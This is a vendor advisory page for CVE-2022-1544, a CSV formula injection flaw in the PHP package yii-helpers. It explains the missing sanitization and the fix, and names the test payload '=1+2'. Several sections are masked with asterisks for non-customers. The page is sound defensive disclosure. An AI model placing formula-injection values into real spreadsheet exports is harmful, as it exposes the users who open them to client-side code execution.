Miggo Logo

CVE-2022-1544: Improper neutralization of formula elements in yii-helpers

7.8

CVSS Score
3.1

Basic Information

EPSS Score
0.6421%
Published
5/3/2022
Updated
2/1/2023
KEV Status
No
Technology
TechnologyPHP

Technical Details

CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Package NameEcosystemVulnerable VersionsFirst Patched Version
luyadev/yii-helperscomposer< 1.2.11.2.1

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability stems from the pre-patch implementation of CSV generation in generateRow. The original code (before 1.2.1) used simple quote escaping but didn't address formula injection vectors. The patch introduced a new sanitizeValue method that adds single-quote prefixing for dangerous starting characters, which was missing in the vulnerable version. The test case update in ExportHelperTest.php confirms the vulnerability by demonstrating proper sanitization of '=1+2' payloads. The CWE-1236 classification and advisory details directly point to CSV formula injection in the CSV generation logic handled by this function.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

*ormul* Inj**tion/*SV Inj**tion *u* to Improp*r N*utr*liz*tion o* *ormul* *l*m*nts in *SV *il* in *it*u* r*pository luy***v/yii-**lp*rs prior to *.*.*. Su***ss*ul *xploit*tion **n l*** to imp**ts su** *s *li*nt-si*** *omm*n* inj**tion, *o** *x**ution

Reasoning

T** vuln*r**ility st*ms *rom t** pr*-p*t** impl*m*nt*tion o* *SV **n*r*tion in `**n*r*t*Row`. T** ori*in*l *o** (***or* *.*.*) us** simpl* quot* *s**pin* *ut *i*n't ***r*ss *ormul* inj**tion v**tors. T** p*t** intro*u*** * n*w `s*nitiz*V*lu*` m*t*o*